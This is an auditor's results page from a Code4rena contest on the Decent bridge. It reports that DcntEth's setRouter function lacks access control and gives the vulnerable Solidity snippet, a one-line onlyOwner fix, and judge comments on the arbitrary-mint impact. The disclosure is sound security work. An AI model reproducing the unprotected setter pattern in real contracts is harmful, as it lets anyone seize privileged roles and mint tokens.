Back to boredpukar's contests

Decent - boredpukar's results

Decent enables one-click transactions using any token across chains.

General Information

Platform: Code4rena

Start Date: 19/01/2024

Pot Size: $36,500 USDC

Total HM: 9

Participants: 113

Period: 3 days

Judge: 0xsomeone

Id: 322

League: ETH

Decent

Findings Distribution

Researcher Performance

Rank: 100/113

Findings: 1

Award: $0.09

🌟 Selected for report: 0

🚀 Solo Findings: 0

External Links

Code4rena Contest PageGithub Contest RepositoryGithub Findings RepositoryDecent

Findings Information

🌟 Selected for report: NPCsCorp

Also found by: 0x11singh99, 0xAadi, 0xBugSlayer, 0xE1, 0xPluto, 0xSimeon, 0xSmartContract, 0xabhay, 0xdice91, 0xprinc, Aamir, Aymen0909, CDSecurity, DadeKuma, DarkTower, EV_om, Eeyore, GeekyLumberjack, GhK3Ndf, Giorgio, Greed, Inference, JanuaryPersimmon2024, Kaysoft, Krace, Matue, MrPotatoMagic, NentoR, Nikki, PUSH0, Soliditors, Tendency, Tigerfrake, Timeless, Timenov, ZanyBonzy, ZdravkoHr, abiih, adeolu, al88nsk, azanux, bareli, boredpukar, cu5t0mpeo, d4r3d3v1l, darksnow, deth, dutra, ether_sky, haxatron, ke1caM, kodyvim, m4ttm, mgf15, mrudenko, nmirchev8, nobody2018, nuthan2x, peanuts, piyushshukla, ravikiranweb3, rouhsamad, seraviz, simplor, slylandro_star, stealth, th13vn, vnavascues, wangxx2026, zaevlad

Awards

0.0879 USDC - $0.09

Labels

bug
3 (High Risk)
partial-75
sufficient quality report
duplicate-721

External Links

Link to GitHub issue

Lines of code

https://github.com/decentxyz/decent-bridge/blob/7f90fd4489551b69c20d11eeecb17a3f564afb18/src/DcntEth.sol#L20

Vulnerability details

Impact

The setRouter function in DcntEth can be called and set by anyone.

Proof of Concept

The contract uses multiple set of modifiers, such as onlyRouter, onlyOwner, etc. to restrict access to sensitive functions.

However, this setRouter function currently lacks access control, which means any address can call it and set the router. This is a significant security risk and should be restricted to the contract owner or another trusted entity.

    /**
     * @param _router the decentEthRouter associated with this eth
     */
     // @audit - can be called and set by anyone.
    function setRouter(address _router) public {
        router = _router;
    }

Tools Used

Manual Review

Secure the setRouter function by implementing proper access control to prevent unauthorized addresses from modifying the router.

    /**
     * @param _router the decentEthRouter associated with this eth
     */
     // @audit - can be called and set by anyone.
-    function setRouter(address _router) public {
+    function setRouter(address _router) public onlyOwner {
        router = _router;
    }

Assessed type

Access Control

#0 - c4-pre-sort

2024-01-24T22:41:36Z

raymondfam marked the issue as sufficient quality report

#1 - c4-pre-sort

2024-01-24T22:41:43Z

raymondfam marked the issue as duplicate of #14

#2 - alex-ppg

2024-02-03T13:15:21Z

Insufficient elaboration on the precise impact of the vulnerability (arbitrary mints of the token).

#3 - c4-judge

2024-02-03T13:15:24Z

alex-ppg marked the issue as partial-75

AuditHub

A portfolio for auditors, a security profile for protocols, a hub for web3 security.

Built bymalatrax © 2024

Auditors

Browse

Contests

Browse

Get in touch

ContactTwitter